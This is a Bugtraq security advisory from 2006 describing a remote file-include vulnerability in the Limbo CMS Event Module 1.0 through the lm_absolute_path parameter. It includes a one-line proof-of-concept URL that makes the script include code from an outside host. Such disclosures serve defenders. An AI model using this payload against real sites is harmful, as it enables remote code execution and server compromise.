Limbo CMS Event Module Remote File Include Vulnerability

Bugtraq ID:	21798
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Dec 28 2006 12:00AM
Updated:	Jan 04 2007 06:27PM
Credit:	xoron is credited with the discovery of this vulnerability.
Vulnerable:	Limbo CMS Event Module 1.0
Not Vulnerable:

Limbo CMS Event Module Remote File Include Vulnerability

Limbo CMS event module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Limbo CMS event module 1.0 is reported vulnerable to this issue.

Limbo CMS Event Module Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept is available:

http://www.example.com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://www.example2.com?

Limbo CMS Event Module Remote File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].

Limbo CMS Event Module Remote File Include Vulnerability

References:

• Module Page (Limbo CMS)
  
• Vendor HomePage (Limbo CMS)
  
• Limbo CMS event module (lm_absolute_path) Remote File Include Vulnerabilities ([email protected])